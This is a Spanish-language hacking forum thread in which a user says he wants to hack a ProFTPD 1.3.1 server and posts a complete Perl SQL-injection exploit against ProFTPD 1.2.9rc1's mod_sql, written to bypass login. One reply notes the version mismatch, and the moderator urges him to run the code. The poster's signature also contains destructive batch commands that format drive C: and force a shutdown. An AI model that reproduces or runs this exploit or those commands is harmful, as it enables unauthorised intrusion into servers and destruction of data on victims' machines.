Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Julio 24, 2008, 08:37:03
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Exploit Proftp 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Exploit Proftp  (Leído 155 veces)
cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 270


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« en: Febrero 06, 2008, 01:22:55 »
me gustaria hackear un servidor
ProFTPD 1.3.1
pero no tengo idea de como empsar, me alludan

encontre exploit pero no se como se usa
Código:
#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if( @ARGC<2){
 print "\nProof Of Concept Sql Inject on ProFTPD\n";
 print "Usage: perl poc-sqlftp <target> [1=Alternate
query]\n\n";
 exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)

 or die "Can't connect. \n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
 print $remote "USER ')UNION
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
 print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash'
WHERE(''='\n";
};
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){ #logged in
 print "[------- Sql Inject Able \n";
}else{
 print "[------- Sql Inject Unable \n";
}
close $remote;

securitydot.net - 2003-06-19
« Última modificación: Febrero 06, 2008, 01:28:49 por cuban-hack » En línea
vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
El Quemero
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1329


100% Quemero


Ver Perfil WWW
« Respuesta #1 en: Febrero 06, 2008, 10:03:15 »
Hay una seccion en el Foro.. soobre Exploit.. ahi podes aprende una cuantas cosas... y depsues por lo que vi...

Al server que queres atacar es la version: 1.3.1 y el exploit que vos mostras es para la version 1.2.9 rc1 asi que no creo que funcione ya en la 1.3.1

Otra cosa.. yo tengo cero ortografia pero "alludan" con "ll"?? aYudan.. Grin Grin
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2044


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #2 en: Febrero 10, 2008, 08:55:17 »
es una inyecion sql... algo rara.. nunca habia visto una inyecion sql hacia un ftp...
ni idea...

intenta interpretarla.. y ejecutar el code.
En línea

http://foro.new-bytes.net
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Exploit Proftp « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC